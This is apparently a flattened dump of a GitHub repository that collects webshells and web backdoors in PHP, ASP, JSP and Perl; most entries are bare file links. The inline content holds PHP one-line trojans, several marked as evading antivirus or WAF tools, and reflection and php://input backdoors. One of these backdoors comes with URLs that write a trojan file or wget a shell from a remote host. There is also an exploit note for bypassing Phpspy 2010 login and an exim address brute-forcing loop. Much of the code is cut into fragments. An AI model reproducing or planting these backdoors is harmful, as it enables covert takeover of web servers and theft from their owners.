-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/r57shell/r57shell.php -------------------------------------------------------------------------------- /php/PHPshell/r57shell127/r57shell127.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/r57shell127/r57shell127.jpg -------------------------------------------------------------------------------- /php/PHPshell/r57shell127/r57shell127.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/r57shell127/r57shell127.php -------------------------------------------------------------------------------- /php/PHPshell/zacosmall/zacosmall.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/zacosmall/zacosmall.jpg -------------------------------------------------------------------------------- /php/PHPshell/【C99madShell v. 3.0】/C99madShell v. 3.0.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【C99madShell v. 3.0】/C99madShell v. 3.0.jpg -------------------------------------------------------------------------------- /php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php -------------------------------------------------------------------------------- /php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php.jpg -------------------------------------------------------------------------------- /php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php2.jpg -------------------------------------------------------------------------------- /php/PHPshell/【PHPJackal v1.5】/PHPJackal v1.5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【PHPJackal v1.5】/PHPJackal v1.5.jpg -------------------------------------------------------------------------------- /php/PHPshell/【PHPJackal v1.5】/PHPJackal v1.5.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【PHPJackal v1.5】/PHPJackal v1.5.php -------------------------------------------------------------------------------- /php/PHPshell/【PHPJackal】/PHPJackal.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【PHPJackal】/PHPJackal.jpg -------------------------------------------------------------------------------- /php/PHPshell/【PHPJackal】/PHPJackal2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【PHPJackal】/PHPJackal2.jpg -------------------------------------------------------------------------------- /php/PHPshell/【Shell [ci] .Biz was here】/Shell [ci] .Biz was here.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【Shell [ci] .Biz was here】/Shell [ci] .Biz was here.jpg -------------------------------------------------------------------------------- /php/PHPshell/【Shell [ci] .Biz was here】/Shell [ci] .Biz was here.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【Shell [ci] .Biz was here】/Shell [ci] .Biz was here.php -------------------------------------------------------------------------------- /php/PHPshell/【c99_madnet】/c99_madnet.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【c99_madnet】/c99_madnet.jpg -------------------------------------------------------------------------------- /php/PHPshell/【c99_madnet】/c99_madnet2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【c99_madnet】/c99_madnet2.jpg -------------------------------------------------------------------------------- /php/PHPshell/【c99_madnet】/密码.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【c99_madnet】/密码.txt -------------------------------------------------------------------------------- /php/PHPshell/【c99_madnet】/连接密码.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【c99_madnet】/连接密码.jpg -------------------------------------------------------------------------------- /php/PHPshell/【ironshell】/ironshell.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【ironshell】/ironshell.jpg -------------------------------------------------------------------------------- /php/PHPshell/【ironshell】/密码.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【ironshell】/密码.txt -------------------------------------------------------------------------------- /php/PHPshell/【phpshell-2.1】/phpshell3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【phpshell-2.1】/phpshell3.jpg -------------------------------------------------------------------------------- /php/PHPshell/【phpshell-2.1】/备注.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【phpshell-2.1】/备注.txt -------------------------------------------------------------------------------- /php/PHPshell/【r57_Mohajer22】/r57_Mohajer22.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【r57_Mohajer22】/r57_Mohajer22.jpg -------------------------------------------------------------------------------- /php/PHPshell/【r57_Mohajer22】/r57_Mohajer222.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【r57_Mohajer22】/r57_Mohajer222.jpg -------------------------------------------------------------------------------- /php/PHPshell/【r57_iFX】/r57.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【r57_iFX】/r57.jpg -------------------------------------------------------------------------------- /php/PHPshell/【r57_iFX】/r572.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【r57_iFX】/r572.jpg -------------------------------------------------------------------------------- /php/PHPshell/【r57_karta】/r57_kartal.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【r57_karta】/r57_kartal.jpg -------------------------------------------------------------------------------- /php/PHPshell/【r57_karta】/r57_kartal2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【r57_karta】/r57_kartal2.jpg -------------------------------------------------------------------------------- /php/PHPshell/【r57】/r57.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【r57】/r57.jpg -------------------------------------------------------------------------------- /php/PHPshell/【r57】/r572.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/PHPshell/【r57】/r572.jpg -------------------------------------------------------------------------------- /php/PHP简单小马源码.php: -------------------------------------------------------------------------------- 1 | OK!"; 7 | else 8 | echo "Error!"; 9 | } 10 | ?> 11 | 12 | PHP小马 - ExpDoor.com 13 | 14 |

15 |
16 |
17 | 18 |

-------------------------------------------------------------------------------- /php/Phpspy 2010 身份验证绕过漏洞: -------------------------------------------------------------------------------- 1 | Phpspy 2010 身份验证绕过漏洞 2 | 作者:我不知道该唱什么 发布时间:April 17, 2011 00:21:28 分类:tech 3 | 4 | 5 | 利用代码: 6 | 7 |
8 | 9 | 10 |
11 | 12 | 在每次向shell请求数据的时候 都附加post一个admin['pass']即可。 13 | 形成原因: 14 | 2009不存在该洞,仅限2010版本,对比二者即可得到答案: 15 | 利用 16 | 17 | foreach(array('_GET','_POST') as $_request) { 18 | foreach($$_request as $_key => $_value) { 19 | if ($_key{0} != '_') { 20 | if (IS_GPC) { 21 | $_value = s_array($_value); 22 | } 23 | $$_key = $_value; 24 | } 25 | } 26 | } 27 | 28 | 对变量$admin['pass']进行覆盖。 -------------------------------------------------------------------------------- /php/angel大马.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/angel大马.php -------------------------------------------------------------------------------- /php/b374k/README.md: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | b374k shell 4 | 5 | Jayalah Indonesiaku 6 | 7 | (c)2014 8 | 9 | https://github.com/b374k/b374k 10 | 11 | 12 | */ -------------------------------------------------------------------------------- /php/blackbin/v1/make2.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php/blackbin/v1/readme.md: -------------------------------------------------------------------------------- 1 | look here: 2 | 3 | http://blog.wangzhan.360.cn/?p=65 4 | 5 | 6 | demo : 7 | 8 | first you open webshell is "404", then enter "p", after show login page 9 | 10 | pass: demo123456 -------------------------------------------------------------------------------- /php/icesword.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/icesword.php -------------------------------------------------------------------------------- /php/img/20140901-01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/img/20140901-01.png -------------------------------------------------------------------------------- /php/img/20140901-02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/img/20140901-02.png -------------------------------------------------------------------------------- /php/img/20140901-03.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/img/20140901-03.jpg -------------------------------------------------------------------------------- /php/img/20140901-04.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/img/20140901-04.jpg -------------------------------------------------------------------------------- /php/img/20140901-05.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/img/20140901-05.jpg -------------------------------------------------------------------------------- /php/img/20140901-06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/img/20140901-06.png -------------------------------------------------------------------------------- /php/itsec.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/itsec.php -------------------------------------------------------------------------------- /php/lpl38-com-php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/lpl38-com-php.txt -------------------------------------------------------------------------------- /php/p2j/11.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/p2j/11.jpg -------------------------------------------------------------------------------- /php/p2j/PHP reflection.php.txt: -------------------------------------------------------------------------------- 1 | invokeArgs(array($_GET[c],$_GET[id])); 4 | ?> 5 | 6 | 7 | 8 | http://xxx.xxx/md.php?m=file_put_contents&c=test11.php&id= //写入一句话马 for linux 9 | http://xx.xxx/md.php?m=file_put_contents&c=test11.php&id= //写入一句话马 for windows 10 | 11 | 12 | 13 | mu201405.php?m=system&c=echo ^ >test11.php //在当前目录下面生成一句话马 for windows 14 | 15 | news.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test11.php //当前目录下载一句话马 for linux -------------------------------------------------------------------------------- /php/p2j/PHP反射后门.php.txt: -------------------------------------------------------------------------------- 1 | 2 | invokeArgs(array($_GET[c])); 5 | ?> -------------------------------------------------------------------------------- /php/p2j/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | alt text 4 | 5 | 6 | *************************************************** 7 | code: 8 | 9 | invokeArgs(array($_GET[c])); 12 | ?> 13 | 14 | *************************************************** -------------------------------------------------------------------------------- /php/pass-waf-2014-10-19.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php/php-extension-backdoor.md: -------------------------------------------------------------------------------- 1 | author:akamajoris 2 | 3 | url:https://github.com/akamajoris/php-extension-backdoor 4 | 5 | Windows: http://stackoff.ru/pishem-rasshirenie-bekdor-dlya-php/ 6 | 7 | Linux: 8 | sudo apt-get install php5-dev 9 | phpize && ./configure && make 10 | 11 | chmod xxx.so 12 | copy xxx.so to /var/www 13 | 14 | edit php.ini 15 | add extension=/var/www/xxx.so 16 | restart apache 17 | 18 | test success!! ^_^ 19 | 20 | demo:http://drops.wooyun.org/tips/3003 -------------------------------------------------------------------------------- /php/php-sh/server.php: -------------------------------------------------------------------------------- 1 | 4 | -------------------------------------------------------------------------------- /php/php-xor.php.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/php-xor.php.md -------------------------------------------------------------------------------- /php/phpkit-0.1a/odd.php: -------------------------------------------------------------------------------- 1 | // php://input based backdoor 2 | // uses include('php://input') to execute arbritary code 3 | // Any valid PHP code sent as raw POST data to backdoor is ran 4 | // overrides the php.ini settings using ini_set :) 5 | // Insecurety Research 2013 | insecurety.net 6 | 11 | -------------------------------------------------------------------------------- /php/phpkit-0.2a/CHANGELOG: -------------------------------------------------------------------------------- 1 | Changelog of phpkit development 2 | -- 3 | 0.1a - 07/01 (Jan)/2013 - Initial Commit 4 | 0.1b - 08/01 (Jan)/2013 - Major Upgrade. Now tests for system(), shell_exec() and passthru() 5 | Uses simple logic to choose the first one that works. 6 | Needs code cleanup soon, and implementation of exec() :) 7 | 0.2a - 17/01 (Jan)/2013 - Realized I was still thinking it was January. Updated the client a bit. 8 | Preparing for the 0.2a release by finishing the upload client and writing 9 | documentation for it. Code is a lot cleaner now though. Still need to fix 10 | the bloody "test" function :/ 11 | -------------------------------------------------------------------------------- /php/phpkit-0.2a/odd.php: -------------------------------------------------------------------------------- 1 | // php://input based backdoor 2 | // uses include('php://input') to execute arbritary code 3 | // Any valid PHP code sent as raw POST data to backdoor is ran 4 | // overrides the php.ini settings using ini_set :) 5 | // Insecurety Research 2013 | insecurety.net 6 | 11 | -------------------------------------------------------------------------------- /php/phpkit-1.0/odd.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /php/phpspy/2008.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/phpspy/2008.php -------------------------------------------------------------------------------- /php/phpspy/2009lite.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/phpspy/2009lite.php -------------------------------------------------------------------------------- /php/phpspy/2009mssql.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/phpspy/2009mssql.php -------------------------------------------------------------------------------- /php/phpspy/2011.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/phpspy/2011.php -------------------------------------------------------------------------------- /php/phpspy/phpspy2010.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/phpspy/phpspy2010.php -------------------------------------------------------------------------------- /php/phpspy/phpspy_2005_full.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/phpspy/phpspy_2005_full.php -------------------------------------------------------------------------------- /php/phpspy/phpspy_2005_lite.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/phpspy/phpspy_2005_lite.php -------------------------------------------------------------------------------- /php/phpspy/phpspy_2006.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/phpspy/phpspy_2006.php -------------------------------------------------------------------------------- /php/php一句话: -------------------------------------------------------------------------------- 1 | [+]php一句话 2 | 3 | 1) 4 | 2) 5 | 3) 6 | 4) 7 | 5) 8 | 6) 9 |   //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 10 |   h=@eval($_POST[c]); 11 | 7) 12 | 8) $filename=$_GET['xbid']; 13 | include ($filename); -------------------------------------------------------------------------------- /php/php一句话02.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | )?> -------------------------------------------------------------------------------- /php/poison.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/poison.php -------------------------------------------------------------------------------- /php/priv8-2012-bypass-shell.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/priv8-2012-bypass-shell.php.txt -------------------------------------------------------------------------------- /php/r00ts php大马.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/r00ts php大马.php -------------------------------------------------------------------------------- /php/silic.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/silic.php -------------------------------------------------------------------------------- /php/spy.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/spy.php -------------------------------------------------------------------------------- /php/webshell-cnseay-x.php: -------------------------------------------------------------------------------- 1 | 14 | -------------------------------------------------------------------------------- /php/webshell-cnseay02-1.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /php/wsb/ReadMe.txt: -------------------------------------------------------------------------------- 1 | #Web Shell BackDoor 2 | For using this tool you must follow this steps : 3 | 1- Upload the php Agent (idc.php) into server 4 | 2- Run the perl script (wsb.pl) on your machine 5 | 3- Give the address of the agent to the perl script 6 | 4- Using this username and password : user :root , pass : toor 7 | 5- Enter Your Commands;) 8 | -------------------------------------------------------------------------------- /php/wsb/idc.php: -------------------------------------------------------------------------------- 1 | 8 | -------------------------------------------------------------------------------- /php/xiao.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/xiao.php.txt -------------------------------------------------------------------------------- /php/yyihacker.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/php/yyihacker.php.txt -------------------------------------------------------------------------------- /php/一个过安全狗的pHp一句话.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /php/不带引号的pHp一句话.php: -------------------------------------------------------------------------------- 1 | 发现有些狗特别喜欢在引号前面加“\” 2 | 3 | 所以找了一个不带引号的pHp一句话 4 | 5 | 6 | 7 | 8 | //pHp的 9 | 10 | 密码1 -------------------------------------------------------------------------------- /php/另类PHP一句话小马.md: -------------------------------------------------------------------------------- 1 | 另类PHP一句话小马 2 | 3 | 利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里面正好保存了这个文件的路径,所以可以直接include进来。 4 | 5 | 10 | 11 | 12 | 13 | from: www.zeroplace.cn 14 | 15 | 选择你的php大马点shell运行 16 | 17 | 我测试的时候的代码就是 -------------------------------------------------------------------------------- /php/极其隐蔽的pHp小马穿插在正常页面中.php: -------------------------------------------------------------------------------- 1 | 7 |
-------------------------------------------------------------------------------- /php/某变异pHp一句话木马.php: -------------------------------------------------------------------------------- 1 | 转载自:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316 2 | 3 | 源码<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?> 4 | 5 | 8 | 9 | 连接方法-> 10 | .php?u=一句话,然后菜马连一句话密码!把配上去 11 | 12 | -------------------------------------------------------------------------------- /php/牛X的pHp一句话.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /php/过各大杀软的pHp一句话.php: -------------------------------------------------------------------------------- 1 | /********************** 2 | 无视当前各大杀软,安全狗,D盾,一流监控! 3 | 4 | pHp一句话,密码 1 5 | **********************/ 6 | 7 | -------------------------------------------------------------------------------- /php/非常规的pHp一句话木马.php: -------------------------------------------------------------------------------- 1 | 8 | 9 | 带md5并可植入任意文件 10 | 11 | 14 | 15 | shell.php?qid=zxexp 密码page -------------------------------------------------------------------------------- /pl/Silic Group_cgi.pl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/pl/Silic Group_cgi.pl -------------------------------------------------------------------------------- /pl/Silic Group_readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/pl/Silic Group_readme.txt -------------------------------------------------------------------------------- /pl/exim.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | $cnt = 0xbffffa10; 4 | 5 | while (1) { 6 | $hex = sprintf ("0x%x", $cnt); 7 | $res = system ("./exploit $hex"); 8 | printf "$hex : $res\n"; 9 | $cnt += 4; 10 | } 11 | 12 | -------------------------------------------------------------------------------- /pl/hmass (priv8 mass defacor).pl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/pl/hmass (priv8 mass defacor).pl -------------------------------------------------------------------------------- /pl/perlwebshell-0.1/AUTHORS: -------------------------------------------------------------------------------- 1 | Main author: Florian Rossol 2 | 3 | Thanks goes to Martin Geisler who has written 4 | PhpShell (http://www.gimpster.com/wiki/PhpShell). 5 | -------------------------------------------------------------------------------- /pl/perlwebshell-0.1/ChangeLog: -------------------------------------------------------------------------------- 1 | PerlWebShell 0.1 2 | 3 | * Initial Release. 4 | 5 | -- Florian Rossol Mon, 15 Mar 2004 22:37 +0100 6 | 7 | -------------------------------------------------------------------------------- /pl/telnet.cgi.pl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/pl/telnet.cgi.pl -------------------------------------------------------------------------------- /pl/telnet.pl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/pl/telnet.pl -------------------------------------------------------------------------------- /py/xshock-0.1.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/py/xshock-0.1.tar.gz -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/3fexe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/3fexe.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/EFSO.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/EFSO.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/ELMALISEKER Backd00r.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/ELMALISEKER Backd00r.asp -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/NTDaddy.v1.9.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/NTDaddy.v1.9.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/RHTools.v1.5-BETA.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/RHTools.v1.5-BETA.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/RemExp.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/RemExp.asp -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/ntdaddy.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/ntdaddy.asp -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/tool.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/tool.asp -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/toolaspshell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/toolaspshell.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/zehir.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/zehir.asp -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/zehir.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/zehir.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/zehir4.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/zehir4.asp -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/ASP/zehir4.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/ASP/zehir4.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/JSP/JspWebshell 1.2.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/JSP/JspWebshell 1.2.jsp -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP.7z -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/2mv2.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/2mv2.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/Crystal.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/Crystal.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/CrystalShell v.1.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/CrystalShell v.1.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/Cyber Shell (v 1.0).php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/Cyber Shell (v 1.0).php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/Dx.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/Dx.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/DxShell.1.0.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/DxShell.1.0.txt 